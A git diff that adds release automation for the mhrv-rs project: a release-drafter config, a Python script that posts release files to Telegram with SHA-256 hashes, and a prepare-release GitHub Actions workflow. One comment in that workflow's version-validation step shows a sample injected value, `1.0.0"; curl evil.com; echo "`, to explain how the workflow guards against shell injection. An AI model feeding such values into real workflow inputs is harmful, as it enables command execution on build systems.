diff --git a/.github/release-drafter.yml b/.github/release-drafter.yml new file mode 100644 index 00000000..02b5753f --- /dev/null +++ b/.github/release-drafter.yml @@ -0,0 +1,79 @@ +# release-drafter config — accumulates merged-PR titles into a draft GitHub +# Release as PRs land on main, so the English half of docs/changelog/v.md +# is prefilled by the time we cut the next release. +# +# How it fits with the existing release flow: +# - PRs merge → release-drafter updates the draft release tagged `next` +# - When ready to ship, run `prepare-release.yml` which reads the draft +# body and writes it into `docs/changelog/v.md` as a stub +# - You translate the bullets into Persian above the `---` separator, +# merge the prep PR, push the `v` tag, and release.yml takes over +# +# The draft is tagged `next` (not `vX.Y.Z`) so it never collides with the +# real release-tag namespace. softprops/action-gh-release in release.yml +# will create a fresh release for the actual `vX.Y.Z` tag — the `next` +# draft just gets reset by release-drafter on the following PR merge. + +name-template: 'Next release (draft)' +tag-template: 'next' + +# Flat bullet template — one line per merged PR, matching the existing +# docs/changelog/v.md style: +# +# • ([#NN](url)): . Thanks @user +# +# We bake the `: . Thanks @AUTHOR` suffix directly into the +# template so the maintainer's job is just (a) strip the leading +# `feat:`/`fix:` Conventional-Commit prefix that PR titles in this repo +# carry (prepare-release.yml does this automatically with a sed pass), +# (b) fix the verb tense if needed (`added` → `Add`), and (c) replace +# `` with the explanatory clause. +# +# Why the placeholder is part of the template and not added later: +# putting it here means the no-changes-template fallback (below) does +# *not* get a `` suffix — only real PR-derived bullets do. +change-template: '• $TITLE ([#$NUMBER]($URL)): . 
Thanks @$AUTHOR' +change-title-escapes: '\<*_&' + +# Fallback if no PRs have merged since the last draft reset. Rare in +# practice; here as a safety net so the draft body is never empty. +# Deliberately doesn't follow the ``-bullet shape so it's +# obviously a placeholder line, not a real release entry. +no-changes-template: '_(no PR-tracked changes since the last release)_' + +# Skip PRs labelled `release-prep` from the changelog — those are the +# automated version-bump PRs opened by prepare-release.yml; including +# them would echo "release: prepare v1.6.6" into the next release notes. +exclude-labels: + - 'release-prep' + - 'skip-changelog' + +# Auto-apply labels based on Conventional Commit title prefixes. The repo +# already enforces feat:/fix:/etc. on PR titles, so this is "free" — no +# contributor action needed. Labels feed the exclude-labels above and +# also unlock PR filtering on the GitHub issues page if we want it later. +autolabeler: + - label: 'release-prep' + title: + - '/^release:/i' + - label: 'type: feature' + title: + - '/^feat(\(.+\))?:/i' + - label: 'type: fix' + title: + - '/^fix(\(.+\))?:/i' + - label: 'type: chore' + title: + - '/^chore(\(.+\))?:/i' + - label: 'type: docs' + title: + - '/^docs?(\(.+\))?:/i' + - label: 'type: refactor' + title: + - '/^refactor(\(.+\))?:/i' + +# Body of the draft release: just the flat bullet list. No "What's +# Changed" header, no contributors block — keep it copy-paste-ready +# into docs/changelog/v.md. +template: | + $CHANGES diff --git a/.github/scripts/telegram_publish_files.py b/.github/scripts/telegram_publish_files.py new file mode 100644 index 00000000..e4300015 --- /dev/null +++ b/.github/scripts/telegram_publish_files.py @@ -0,0 +1,550 @@ +#!/usr/bin/env python3 +"""Post each release artifact individually to a Telegram channel. + +Used by .github/workflows/telegram-publish-files.yml. 
Reads files from +--assets-dir, picks a Persian caption per filename, posts via the +Telegram Bot API `sendDocument` endpoint with --hashtag appended. + +Files larger than the Telegram Bot API's 50 MB ceiling are split into +~45 MB byte chunks via Python (no `split` shell dep) and posted as +`.part_aa`, `.part_ab`, ... — recipients reassemble with +`cat .part_* > `. + +Re-runnable: posts every file every time. Use carefully when re-running +for the same version (the channel will get duplicate posts). +""" + +from __future__ import annotations + +import argparse +import hashlib +import os +import sys +import time +import urllib.error +import urllib.parse +import urllib.request +import json +from pathlib import Path + +# Telegram Bot API uploads cap at 50 MB. Pick 45 MB for chunks so the +# multipart envelope + caption + Telegram's own overhead don't push us +# over. Bigger chunks (e.g. 49 MB) sometimes hit "Request Entity Too +# Large" depending on caption length. +CHUNK_LIMIT_BYTES = 45 * 1024 * 1024 + +# Sleep between uploads. Telegram's documented rate limit is 1 msg/sec +# to the same chat, plus a soft "burst" allowance. 1.5s is conservative +# and means a 20-file release publishes in ~30 s. +INTER_UPLOAD_SLEEP_SECS = 1.5 + +# Filename-substring → Persian caption. Order matters: longest / +# most-specific patterns first, since a shorter pattern (e.g. +# "android-x86") can match a more-specific filename ("android-x86_64"). +# Match is `pattern in filename`. +CAPTIONS: list[tuple[str, str]] = [ + # Android — universal first (the recommended default for non-technical users). + ("android-universal", "نسخه اندروید (universal) — برای همه دستگاه‌ها"), + ("android-arm64-v8a", "نسخه اندروید (arm64-v8a) — گوشی‌های مدرن ۶۴ بیتی"), + ("android-armeabi-v7a", "نسخه اندروید (armv7) — گوشی‌های قدیمی‌تر ۳۲ بیتی"), + ("android-x86_64", "نسخه اندروید (x86_64) — شبیه‌ساز ۶۴ بیتی"), + ("android-x86", "نسخه اندروید (x86) — شبیه‌ساز"), + # Windows. 
+ ("windows-amd64", "نسخه ویندوز x64 (۶۴ بیتی)"), + ("windows-i686", "نسخه ویندوز x86 (۳۲ بیتی، Win7+)"), + # macOS — .app bundles before plain CLI tarballs. + ("macos-arm64-app", "نسخه macOS (Apple Silicon) — برنامه گرافیکی .app"), + ("macos-amd64-app", "نسخه macOS (Intel) — برنامه گرافیکی .app"), + ("macos-arm64", "نسخه macOS (Apple Silicon) — CLI"), + ("macos-amd64", "نسخه macOS (Intel) — CLI"), + # Linux — musl static first, glibc second. + ("linux-musl-amd64", "نسخه لینوکس amd64 (musl static) — Alpine / OpenWRT-x86"), + ("linux-musl-arm64", "نسخه لینوکس arm64 (musl static)"), + ("linux-amd64", "نسخه لینوکس amd64 (glibc)"), + ("linux-arm64", "نسخه لینوکس arm64 (glibc)"), + # Embedded targets. + ("openwrt-mipsel-softfloat", "نسخه OpenWRT (mipsel softfloat) — روتر MT7621"), + ("raspbian-armhf", "نسخه Raspbian (armhf) — رزبری پای ۳۲ بیتی"), +] + + +def caption_for(filename: str) -> str: + """Return the Persian caption for a filename, falling back to the + bare filename if nothing matches.""" + for pattern, persian in CAPTIONS: + if pattern in filename: + return persian + return f"نسخه `{filename}`" + + +def order_files(files: list[Path]) -> list[Path]: + """Sort release files in CAPTIONS order (Android first, then + Windows, macOS, Linux, embedded). Files not matching any pattern + fall to the end in alphabetical order.""" + order_map: dict[str, int] = {pattern: idx for idx, (pattern, _) in enumerate(CAPTIONS)} + + def key(p: Path) -> tuple[int, str]: + for pattern, idx in order_map.items(): + if pattern in p.name: + return (idx, p.name) + # Unknown patterns: push to end, alphabetize among themselves. + return (len(CAPTIONS), p.name) + + return sorted(files, key=key) + + +def split_file(path: Path, chunk_bytes: int) -> list[Path]: + """Split `path` into chunks of at most `chunk_bytes` bytes. Returns + the list of chunk paths, named `<name>.part_aa`, `<name>.part_ab`, ... + Mimics `split -b <size> <file>`. Reassembled via + `cat <name>.part_* > <name>`. 
+ + Skips work if existing parts are already present (idempotent re-run).""" + parts: list[Path] = [] + + def part_name(idx: int) -> str: + # 26-letter base: aa..az, ba..bz, ... mirroring split's default. + first = chr(ord("a") + idx // 26) + second = chr(ord("a") + idx % 26) + return f"{path.name}.part_{first}{second}" + + idx = 0 + with path.open("rb") as src: + while True: + buf = src.read(chunk_bytes) + if not buf: + break + part_path = path.parent / part_name(idx) + with part_path.open("wb") as dst: + dst.write(buf) + parts.append(part_path) + idx += 1 + return parts + + +def send_document( + bot_token: str, + chat_id: str, + file_path: Path, + caption: str, +) -> dict: + """POST a single file via the Telegram Bot API sendDocument endpoint. + Returns the parsed JSON response. Raises on HTTP error. + + Uses urllib + a hand-rolled multipart/form-data encoder so we don't + pull `requests` (the workflow runs on stock GitHub-hosted runners + where stdlib-only is preferable for cold-start speed).""" + url = f"https://api.telegram.org/bot{bot_token}/sendDocument" + boundary = "----mhrvUploadBoundary" + str(int(time.time() * 1000)) + body = build_multipart( + boundary, + fields={ + "chat_id": chat_id, + "caption": caption, + "parse_mode": "HTML", + # Disable preview to keep the channel tidy. + "disable_notification": "false", + }, + files={"document": (file_path.name, file_path.read_bytes(), "application/octet-stream")}, + ) + req = urllib.request.Request( + url, + data=body, + headers={"Content-Type": f"multipart/form-data; boundary={boundary}"}, + method="POST", + ) + # 5 minute timeout for the actual upload — Telegram occasionally + # takes a while to process 40+ MB documents. + with urllib.request.urlopen(req, timeout=300) as resp: + return json.loads(resp.read().decode("utf-8")) + + +def build_multipart( + boundary: str, + fields: dict[str, str], + files: dict[str, tuple[str, bytes, str]], +) -> bytes: + """Build a multipart/form-data body. 
`files` is name → (filename, + bytes, mime). Plain stdlib so we don't need `requests`.""" + parts: list[bytes] = [] + crlf = b"\r\n" + bnd = f"--{boundary}".encode() + + for name, value in fields.items(): + parts.append(bnd) + parts.append(f'Content-Disposition: form-data; name="{name}"'.encode()) + parts.append(b"") + parts.append(value.encode("utf-8")) + + for name, (filename, data, mime) in files.items(): + parts.append(bnd) + parts.append( + f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode() + ) + parts.append(f"Content-Type: {mime}".encode()) + parts.append(b"") + parts.append(data) + + parts.append(f"--{boundary}--".encode()) + parts.append(b"") + return crlf.join(parts) + + +def html_escape(s: str) -> str: + return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;") + + +def sha256_hex(path: Path) -> str: + """Stream-hash the file in 1 MiB chunks. Avoids loading 40+ MB APKs + into RAM twice (once for hashing, once for upload).""" + h = hashlib.sha256() + with path.open("rb") as f: + for chunk in iter(lambda: f.read(1 << 20), b""): + h.update(chunk) + return h.hexdigest() + + +def post_file( + bot_token: str, + chat_id: str, + file_path: Path, + base_caption: str, + hashtag: str, +) -> bool: + """Post one file. If too big, split + post each part. Returns True + on success of all parts, False on any failure. + + Each caption ends with the file's SHA-256 in hex under a Persian + "تایید اصالت" (authenticity verification) label, so recipients can + `sha256sum ` after download and confirm it matches what the + channel posted — defends against modified copies if the channel is + ever compromised or relayed through a third party.""" + size = file_path.stat().st_size + + # Compute the original-file hash regardless of whether we'll chunk + # it. For chunked uploads, every part's caption shows this hash so + # the user can verify the full file once reassembled with `cat`. 
+ print(f" hashing {file_path.name}...", flush=True) + full_sha = sha256_hex(file_path) + + if size <= CHUNK_LIMIT_BYTES: + caption = ( + f"{html_escape(base_caption)}\n" + f"{html_escape(file_path.name)}\n" + f"\nتایید اصالت (SHA-256):\n" + f"{full_sha}\n" + f"\n{hashtag}" + ) + print(f" uploading {file_path.name} ({size / 1_048_576:.1f} MB)...", flush=True) + try: + resp = send_document(bot_token, chat_id, file_path, caption) + if not resp.get("ok"): + print(f" !! Telegram returned not-ok: {resp}", flush=True) + return False + print(f" ok (message_id={resp['result']['message_id']})", flush=True) + return True + except urllib.error.HTTPError as e: + err_body = e.read().decode("utf-8", errors="replace")[:500] + print(f" !! HTTP {e.code}: {err_body}", flush=True) + return False + except Exception as e: + print(f" !! exception: {e}", flush=True) + return False + finally: + time.sleep(INTER_UPLOAD_SLEEP_SECS) + + # Too big — split and post each part. + print( + f" splitting {file_path.name} ({size / 1_048_576:.1f} MB > " + f"{CHUNK_LIMIT_BYTES / 1_048_576:.0f} MB ceiling)...", + flush=True, + ) + parts = split_file(file_path, CHUNK_LIMIT_BYTES) + if not parts: + print(f" !! split produced 0 parts (empty file?)", flush=True) + return False + + n = len(parts) + all_ok = True + for idx, part_path in enumerate(parts, start=1): + # Hash the individual part too — lets the user verify each + # downloaded chunk before bothering to reassemble. 
+ part_sha = sha256_hex(part_path) + part_caption = ( + f"{html_escape(base_caption)} — قسمت {idx}/{n}\n" + f"{html_escape(part_path.name)}\n" + f"\nبرای بازسازی فایل اصلی:\n" + f"cat {html_escape(file_path.name)}.part_* > " + f"{html_escape(file_path.name)}\n" + f"\nتایید اصالت این قسمت (SHA-256):\n" + f"{part_sha}\n" + f"\nتایید اصالت فایل کامل پس از بازسازی (SHA-256):\n" + f"{full_sha}\n" + f"\n{hashtag}" + ) + psize = part_path.stat().st_size + print( + f" uploading part {idx}/{n}: {part_path.name} ({psize / 1_048_576:.1f} MB)...", + flush=True, + ) + try: + resp = send_document(bot_token, chat_id, part_path, part_caption) + if not resp.get("ok"): + print(f" !! Telegram returned not-ok: {resp}", flush=True) + all_ok = False + else: + print( + f" ok (message_id={resp['result']['message_id']})", flush=True + ) + except urllib.error.HTTPError as e: + err_body = e.read().decode("utf-8", errors="replace")[:500] + print(f" !! HTTP {e.code}: {err_body}", flush=True) + all_ok = False + except Exception as e: + print(f" !! exception: {e}", flush=True) + all_ok = False + finally: + time.sleep(INTER_UPLOAD_SLEEP_SECS) + # Tidy up the part file once posted. + try: + part_path.unlink() + except OSError: + pass + + return all_ok + + +def files_channel_post_link(chat_id: str, message_id: int) -> str: + """Build a `t.me` link to a specific message in the files channel. + + For private supergroups/channels (negative ID with `-100` prefix), + Telegram exposes posts at `https://t.me/c//` where `` + is the chat ID with the `-100` stripped. This link works for users + who are members of the channel. + + If `FILES_CHANNEL_USERNAME` is set in env (e.g. 
`mhrv_files`), uses + the public-channel form `https://t.me/<username>/<message_id>` instead, + which is clickable for everyone.""" + username = os.environ.get("FILES_CHANNEL_USERNAME", "").strip().lstrip("@") + if username: + return f"https://t.me/{username}/{message_id}" + cid = chat_id + if cid.startswith("-100"): + cid = cid[4:] + elif cid.startswith("-"): + cid = cid[1:] + return f"https://t.me/c/{cid}/{message_id}" + + +def post_main_channel_pointer( + bot_token: str, + main_chat_id: str, + files_channel_post_link: str, + version: str, + hashtag: str, + channel_username_link: str = "", + channel_invite_link: str = "", +) -> bool: + """Post a short cross-link to the main announcement channel pointing + at the anchor post in the files channel. Replaces the previous + behaviour of posting the universal APK + full changelog directly + to the main channel — the main channel becomes a discovery surface + while the files channel hosts the actual artifacts. + + Includes channel-join links (public username + invite hash) at the + bottom so recipients who aren't yet members can subscribe before + clicking through to the specific release post. + """ + parts = [ + f"📦 mhrv-rs v{html_escape(version)} منتشر شد", + "", + f"برای دانلود فایل‌ها (Android، Windows، macOS، Linux و ...) " + f"به کانال فایل‌ها مراجعه کنید:", + "", + f'👉 <a href="{files_channel_post_link}">' + f"v{html_escape(version)} — همه فایل‌ها + SHA-256</a>", + ] + # Channel-join links. Two forms handle different states of the + # files channel: the `t.me/<username>` form works for public + # channels and is the prettier link; the `t.me/+<hash>` invite + # link works regardless of whether the channel is public, and is + # the only path in for private/restricted channels. Showing both + # is forgiving — recipients click whichever works for them. 
+ if channel_username_link or channel_invite_link: + parts.append("") + parts.append("لینک کانال:") + if channel_username_link: + # Render as plain URL (not HTML ) so the text shows the + # link itself — useful when users share the message via + # screenshot or copy-paste outside Telegram, which would + # strip the wrapper. + parts.append(html_escape(channel_username_link)) + if channel_invite_link: + parts.append(f"و یا: {html_escape(channel_invite_link)}") + parts.append("") + parts.append(hashtag) + text = "\n".join(parts) + url = f"https://api.telegram.org/bot{bot_token}/sendMessage" + data = urllib.parse.urlencode({ + "chat_id": main_chat_id, + "text": text, + "parse_mode": "HTML", + "disable_web_page_preview": "false", + }).encode() + print(f" posting cross-link to main channel {main_chat_id}...", flush=True) + try: + with urllib.request.urlopen( + urllib.request.Request(url, data=data, method="POST"), timeout=30 + ) as resp: + r = json.loads(resp.read().decode("utf-8")) + if not r.get("ok"): + print(f" !! main-channel post failed: {r}", flush=True) + return False + print( + f" ok (message_id={r['result']['message_id']})", flush=True + ) + return True + except urllib.error.HTTPError as e: + err_body = e.read().decode("utf-8", errors="replace")[:500] + print(f" !! HTTP {e.code}: {err_body}", flush=True) + return False + except Exception as e: + print(f" !! exception: {e}", flush=True) + return False + + +def main() -> int: + parser = argparse.ArgumentParser(description=__doc__) + parser.add_argument("--assets-dir", required=True, type=Path) + parser.add_argument("--version", required=True, help="e.g. 1.8.0") + parser.add_argument("--hashtag", required=True, help="e.g. 
#v180") + args = parser.parse_args() + + bot_token = os.environ.get("BOT_TOKEN") + chat_id = os.environ.get("CHAT_ID") + if not bot_token or not chat_id: + print("BOT_TOKEN and CHAT_ID env vars required", file=sys.stderr) + return 2 + + if not args.assets_dir.is_dir(): + print(f"--assets-dir {args.assets_dir} not a directory", file=sys.stderr) + return 2 + + # Collect all regular files in the directory (no recursion). Skip + # split-part leftovers from a previous run of this script if any + # exist — we'll regenerate cleanly. + raw_files = [ + p for p in args.assets_dir.iterdir() + if p.is_file() and ".part_" not in p.name + ] + if not raw_files: + print(f"no files found in {args.assets_dir}", file=sys.stderr) + return 2 + + files = order_files(raw_files) + print(f"publishing {len(files)} file(s) to Telegram chat {chat_id} for v{args.version}:") + for f in files: + print(f" - {f.name}") + print() + + # Leading announcement in the files channel. Captured `message_id` + # is the anchor that the main-channel cross-link points at — the + # main channel doesn't carry files anymore, just a single message + # saying "new release, click here." Recipients land on this anchor + # and scroll down to see all the platform-specific files. + announce = ( + f"📦 mhrv-rs {html_escape('v' + args.version)} منتشر شد\n" + f"\nفایل‌ها در ادامه به ترتیب پلتفرم ارسال می‌شن.\n" + f"هر فایل با SHA-256 (تایید اصالت) همراه هست.\n" + f"\n{args.hashtag}" + ) + announce_msg_id: int | None = None + try: + url = f"https://api.telegram.org/bot{bot_token}/sendMessage" + data = urllib.parse.urlencode({ + "chat_id": chat_id, + "text": announce, + "parse_mode": "HTML", + "disable_web_page_preview": "true", + }).encode() + with urllib.request.urlopen( + urllib.request.Request(url, data=data, method="POST"), timeout=30 + ) as resp: + r = json.loads(resp.read().decode("utf-8")) + if not r.get("ok"): + print(f" !! 
announcement failed: {r}", flush=True) + else: + announce_msg_id = r["result"]["message_id"] + print( + f" announcement posted (message_id={announce_msg_id})", + flush=True, + ) + except Exception as e: + # Non-fatal for the file uploads, but cross-link to the main + # channel below will be skipped — without the anchor message_id + # there's nothing to point at. + print(f" !! announcement exception: {e}", flush=True) + time.sleep(INTER_UPLOAD_SLEEP_SECS) + + failures = 0 + for f in files: + base = caption_for(f.name) + ok = post_file(bot_token, chat_id, f, base, args.hashtag) + if not ok: + failures += 1 + + # Cross-link to the main announcement channel. Skipped if MAIN_CHAT_ID + # is unset (development / private testing) or if the files-channel + # announcement didn't post (no anchor to link to). + main_chat_id = os.environ.get("MAIN_CHAT_ID", "").strip() + if main_chat_id and announce_msg_id is not None: + link = files_channel_post_link(chat_id, announce_msg_id) + # Optional channel-join links rendered alongside the cross-link. + # `FILES_CHANNEL_USERNAME` is the public-username form (clean + # `t.me/` URL — clickable for everyone). `FILES_CHANNEL_INVITE` + # is the `t.me/+` invite link, the only join path for + # private channels. Either or both can be set; both render in + # the body as separate lines. 
+ username = os.environ.get("FILES_CHANNEL_USERNAME", "").strip().lstrip("@") + username_link = f"https://t.me/{username}" if username else "" + invite_link = os.environ.get("FILES_CHANNEL_INVITE", "").strip() + print() + print(f"posting cross-link to main channel:") + print(f" post link: {link}") + if username_link: + print(f" channel username link: {username_link}") + if invite_link: + print(f" channel invite link: {invite_link}") + ok = post_main_channel_pointer( + bot_token, + main_chat_id, + link, + args.version, + args.hashtag, + channel_username_link=username_link, + channel_invite_link=invite_link, + ) + if not ok: + failures += 1 + elif main_chat_id and announce_msg_id is None: + print() + print( + " !! MAIN_CHAT_ID is set but announcement message_id is None — " + "skipping cross-link (no anchor to point at).", + flush=True, + ) + failures += 1 + else: + print() + print(" MAIN_CHAT_ID not set, skipping cross-link", flush=True) + + print() + if failures: + print(f"DONE with {failures} failure(s) out of {len(files)}", flush=True) + return 1 + print(f"DONE — {len(files)} files posted successfully", flush=True) + return 0 + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/.github/scripts/telegram_release_notify.py b/.github/scripts/telegram_release_notify.py index da04d8b8..df1641b6 100755 --- a/.github/scripts/telegram_release_notify.py +++ b/.github/scripts/telegram_release_notify.py @@ -46,16 +46,42 @@ from pathlib import Path +def _strip_leading_comments(body: str) -> str: + """Strip leading HTML comment blocks (single- or multi-line) from `body`. + + The changelog template uses `` to document the format for + editors; we don't want those echoed to Telegram or the GitHub Release + page. The `(?:...)+` quantifier eats N consecutive comments separated + only by whitespace, so a stub with both a format-docs comment and a + TODO comment is cleaned in one pass. `re.S` makes `.` cross newlines + for multi-line `` blocks. 
+ + The matching regex is also used inline by .github/workflows/release.yml + to compose the GitHub Release body — keep them in sync if you change + one. Run `python -m doctest telegram_release_notify.py -v` to check. + + >>> _strip_leading_comments("<!-- a -->\\nbody") + 'body' + >>> _strip_leading_comments("<!-- a -->\\n<!-- b -->\\nbody") + 'body' + >>> _strip_leading_comments("<!-- multi\\nline -->\\nbody") + 'body' + >>> _strip_leading_comments("<!-- a -->\\n\\n<!-- b -->\\n\\nbody") + 'body' + >>> _strip_leading_comments("body without comments") + 'body without comments' + >>> _strip_leading_comments("body\\n<!-- mid -->\\nmore") + 'body\\n<!-- mid -->\\nmore' + """ + return re.sub(r"^\s*(?:<!--.*?-->\s*)+", "", body, count=1, flags=re.S) + + def parse_changelog(path: str) -> tuple[str, str]: """Return (persian_body, english_body). Blank strings if file missing.""" p = Path(path) if not p.is_file(): return "", "" - body = p.read_text(encoding="utf-8") - # Strip a leading HTML comment block if present — the changelog - # template uses <!-- ... --> to document the format for editors; - # we don't want that echoed to Telegram. - body = re.sub(r"^\s*<!--.*?-->\s*", "", body, count=1, flags=re.S) + body = _strip_leading_comments(p.read_text(encoding="utf-8")) fa, sep, en = body.partition("\n---\n") if not sep: # No separator — treat everything as Persian (content-language diff --git a/.github/workflows/prepare-release.yml b/.github/workflows/prepare-release.yml new file mode 100644 index 00000000..2eb83720 --- /dev/null +++ b/.github/workflows/prepare-release.yml @@ -0,0 +1,296 @@ +# Prepare a new release: bump version strings, prefill the changelog +# stub from release-drafter's draft, and open a PR. After the PR is +# merged, you push the `v<version>` tag manually and `release.yml` +# takes over (matrix build → GitHub release → Telegram notify). 
+# +# Triggered manually from the Actions UI or via: +# gh workflow run prepare-release.yml -f version=1.6.6 +# +# What it bumps in the PR: +# - Cargo.toml version = "X.Y.Z" +# - Cargo.lock mhrv-rs entry's version +# - android/app/build.gradle.kts versionName = "X.Y.Z" +# versionCode = previous + 1 +# +# What it leaves alone: +# - tunnel-node/Cargo.toml — versioned independently from the app. +# The docker tunnel image is tagged from the git release tag (not +# from this Cargo.toml), so we don't need to touch it. +# +# What it prefills in docs/changelog/v.md: +# - Persian section: an inline `[FA] translate ...` placeholder line. +# Visible if not edited — ships into the release page as an obvious +# marker rather than a quiet comment leak. +# - Separator: `---` +# - English section: bullets pulled from release-drafter's `next` +# draft release, each suffixed with `: ` to remind you to +# add an explanatory clause in the project's existing +# `• headline (#NN): full explanation` style. If no draft exists +# yet (e.g. immediately after installing release-drafter, before +# any PRs have merged), the English section is empty and you fill +# it in by hand. + +name: prepare-release + +on: + workflow_dispatch: + inputs: + version: + description: 'New version to release (without the leading v). Example: 1.6.6' + required: true + type: string + +permissions: + contents: write + pull-requests: write + +jobs: + bump: + runs-on: ubuntu-latest + steps: + # Always check out main, regardless of which branch the dispatch + # was fired from. workflow_dispatch can be triggered from any ref; + # without an explicit `ref:` the version bumps would land on top + # of whatever branch the dispatcher had checked out, and the + # resulting PR would carry that branch's diffs alongside the bumps. 
+ - uses: actions/checkout@v4 + with: + ref: main + fetch-depth: 0 # need tag history for the duplicate-tag check below + + - name: Validate version + id: ver + env: + # Pass the dispatch input through an env var rather than + # `${{ inputs.version }}` interpolation. GitHub interpolates + # the expression *before* the shell parses the script, so a + # value like `1.0.0"; curl evil.com; echo "` would execute + # before the regex check below ever ran. workflow_dispatch + # is gated to write-access users so practical risk is low, + # but this is the pattern GitHub's own docs recommend for + # defense in depth. + INPUT_VERSION: ${{ inputs.version }} + run: | + set -euo pipefail + VER="$INPUT_VERSION" + VER="${VER#v}" + if ! [[ "$VER" =~ ^[0-9]+\.[0-9]+\.[0-9]+$ ]]; then + echo "::error::version '$VER' is not in X.Y.Z format" + exit 1 + fi + if git rev-parse "v${VER}" >/dev/null 2>&1; then + echo "::error::tag v${VER} already exists; pick a different version" + exit 1 + fi + BRANCH="release/v${VER}" + if git ls-remote --exit-code --heads origin "$BRANCH" >/dev/null 2>&1; then + echo "::error::branch $BRANCH already exists on origin; delete it or pick a different version" + exit 1 + fi + echo "version=${VER}" >> "$GITHUB_OUTPUT" + echo "branch=${BRANCH}" >> "$GITHUB_OUTPUT" + + - name: Bump Cargo.toml + Cargo.lock + env: + NEW_VER: ${{ steps.ver.outputs.version }} + run: | + set -euo pipefail + # Edit both files via Python so we anchor on the `name = "mhrv-rs"` + # line and only touch the package's own version, not unrelated + # `version = "..."` lines elsewhere in the lockfile. 
+ python3 <<'PY' + import os, re, pathlib, sys + ver = os.environ["NEW_VER"] + for path in ("Cargo.toml", "Cargo.lock"): + p = pathlib.Path(path) + src = p.read_text() + new = re.sub( + r'(name = "mhrv-rs"\nversion = ")[0-9.]+(")', + rf'\g<1>{ver}\g<2>', + src, + count=1, + ) + if new == src: + sys.exit(f"ERROR: mhrv-rs version line not found in {path}") + p.write_text(new) + print(f"{path} -> {ver}") + PY + + - name: Bump android versionName + versionCode + env: + NEW_VER: ${{ steps.ver.outputs.version }} + run: | + set -euo pipefail + # versionCode increments by 1 on every release; versionName mirrors + # the Cargo version. Both live in android/app/build.gradle.kts. + python3 <<'PY' + import os, re, pathlib, sys + ver = os.environ["NEW_VER"] + p = pathlib.Path("android/app/build.gradle.kts") + src = p.read_text() + m = re.search(r'versionCode\s*=\s*(\d+)', src) + if not m: + sys.exit("ERROR: versionCode not found in build.gradle.kts") + old_code = int(m.group(1)) + new_code = old_code + 1 + src = src[:m.start(1)] + str(new_code) + src[m.end(1):] + src, n = re.subn( + r'versionName\s*=\s*"[^"]+"', + f'versionName = "{ver}"', + src, + count=1, + ) + if n == 0: + sys.exit("ERROR: versionName not found in build.gradle.kts") + p.write_text(src) + print(f"android/app/build.gradle.kts -> versionName={ver}, versionCode={old_code}->{new_code}") + PY + + - name: Fetch release-drafter draft body + id: draft + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + set -euo pipefail + # release-drafter accumulates merged-PR titles into a draft tagged + # `next`. Pull its body for the changelog stub. `--repo` is set + # explicitly so we always look up the release in this repo even + # if a future maintainer ever creates a real `next` git tag in a + # fork or upstream. If no draft exists yet (release-drafter just + # installed, no PRs merged since), the `|| true` keeps us going + # with an empty body — you fill the English section by hand. 
+ # `--jq 'select(.isDraft) | .body'` returns nothing if `next` is + # not a draft (i.e. someone manually published a release with + # tag `next`, or pushed a real `next` git tag with a release + # attached). On that path we treat it as "no draft" and fall + # through to the empty-body branch — better than echoing a + # surprise release body into the changelog stub. + BODY=$(gh release view next --repo "${{ github.repository }}" \ + --json body,isDraft --jq 'select(.isDraft) | .body' 2>/dev/null || true) + if [ -z "$BODY" ]; then + echo "::notice::no release-drafter 'next' draft found; English section will be empty" + else + echo "::notice::pulled $(printf '%s' "$BODY" | wc -l) lines from draft release" + fi + # Multiline outputs need a heredoc-style delimiter — pick one that + # cannot appear in a release-drafter bullet line. + { + echo 'body<<__DRAFT_BODY_EOF__' + printf '%s\n' "$BODY" + echo '__DRAFT_BODY_EOF__' + } >> "$GITHUB_OUTPUT" + + - name: Write changelog stub + env: + NEW_VER: ${{ steps.ver.outputs.version }} + DRAFT_BODY: ${{ steps.draft.outputs.body }} + run: | + set -euo pipefail + # Build the file with shell `echo`/`printf` (not a YAML-level + # heredoc with $-double-curly interpolation) so backticks, dollar + # signs, or EOF tokens in the draft body can't break us. + # + # Why no TODO/instructional : + # release.yml strips leading blocks from the + # file before publishing the GitHub Release body, and the + # Telegram script does the same — both via a regex that handles + # multiple consecutive comments. But relying on stripping is + # brittle: a maintainer adding a new comment with a different + # shape (multi-line, indented, etc.) could leak it. Instead we + # use VISIBLE placeholders below. If the maintainer forgets to + # edit them, they ship as obvious `[FA]`/`` markers + # that an admin will spot in the release page within seconds. 
+ mkdir -p docs/changelog + OUT="docs/changelog/v${NEW_VER}.md" + { + echo '' + echo '[FA] translate the English bullets below into Persian and replace this line.' + echo '' + echo '---' + # Append the English section if release-drafter had any. + # Skip the printf entirely on empty so we don't leave a + # trailing blank line under `---`. + if [ -n "$DRAFT_BODY" ]; then + # Strip Conventional-Commit prefixes (`feat:`, `fix(android):`, + # etc.) from the start of each bullet headline. PR titles in + # this repo all carry these prefixes by convention, but the + # existing changelog style is verb-first ("Add X" / "Fix Y"), + # not type-first. Stripping here saves the maintainer one + # manual step per bullet; they still need to fix the verb + # tense (e.g. "added" → "Add") since GitHub PR titles tend + # to be past-tense and the changelog convention is imperative. + # + # Bullet shape from release-drafter is: + # • feat(scope): title text ([#NN](url)): . Thanks @user + # After this sed: + # • title text ([#NN](url)): . Thanks @user + printf '%s\n' "$DRAFT_BODY" \ + | sed -E 's/^(• )(feat|fix|chore|docs?|refactor|perf|test|build|ci|style|revert)(\([^)]*\))?!?: */\1/i' + fi + } > "$OUT" + echo "wrote $OUT ($(wc -l < "$OUT") lines)" + + # No `Ensure release-prep label exists` step here — release-drafter's + # workflow runs on every push to main, and its `Ensure autolabeler + # labels exist` step creates `release-prep` (along with the type:* + # labels). Since these workflow files only land via a push to main, + # release-drafter's bootstrap necessarily runs before the first + # prepare-release dispatch. If for some reason release-drafter is + # disabled, `gh pr create --label release-prep` below will fail with + # an actionable "label not found" — fix is to re-enable + # release-drafter or run `gh label create release-prep` once by hand. 
